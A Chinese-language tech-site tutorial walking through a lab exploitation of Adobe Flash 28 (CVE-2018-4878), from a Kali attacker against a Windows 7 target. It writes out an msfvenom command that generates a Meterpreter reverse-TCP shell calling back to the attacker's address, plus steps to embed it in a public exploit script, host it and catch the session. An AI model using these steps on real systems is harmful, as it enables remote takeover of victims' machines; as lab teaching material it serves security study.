Adobe flash player 28漏洞攻击的分析

发布时间:2021-12-28 17:25:24 作者:柒染
来源:亿速云 阅读:188

Adobe flash player 28漏洞攻击的分析,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。

Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会触发漏洞,可直接getshell。准备工作:靶机信息:192.168.2.134(windows 7 SP1)Flash版本:28.0.0.137攻击机信息:192.168.2.132(kali linux)漏洞利用脚本:CVE-2018-4878-master漏洞利用:

1.使用msfvenom生成shellcode,msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.132 LPORT=7777 -f python>shellcode.txt>。

Adobe flash player 28漏洞攻击的分析

2.替换原 cve-2018-4878.py中的shellcode,并修改参数stageless=False。Adobe flash player 28漏洞攻击的分析

3.在代码中修改要生成的文件和路径。

Adobe flash player 28漏洞攻击的分析

4.执行修改后的cve-2018-4878.py文件,生成index和exploit两个文件。Adobe flash player 28漏洞攻击的分析

5.将生成的两个文件复制到web目录环境下。

Adobe flash player 28漏洞攻击的分析

6.在kali的msf中启用监听。

Adobe flash player 28漏洞攻击的分析

7.在win7主机中使用含漏洞的浏览器和Adobe Flash访问http://192.168.2.132/index.html,kali中即可获取到靶机会话。

Adobe flash player 28漏洞攻击的分析

看完上述内容,你们掌握Adobe flash player 28漏洞攻击的分析的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注亿速云行业资讯频道,感谢各位的阅读!

推荐阅读:
  1. 怎么在Windows上如何安装和彻底卸载Adobe Flash Player
  2. adobe flash player版本太旧如何解决

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

adobe flash player

上一篇:fabric示例e2e_cli中network_setup.sh流程是怎么样的

下一篇:如何实现ThinkAdmin的漏洞复现

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》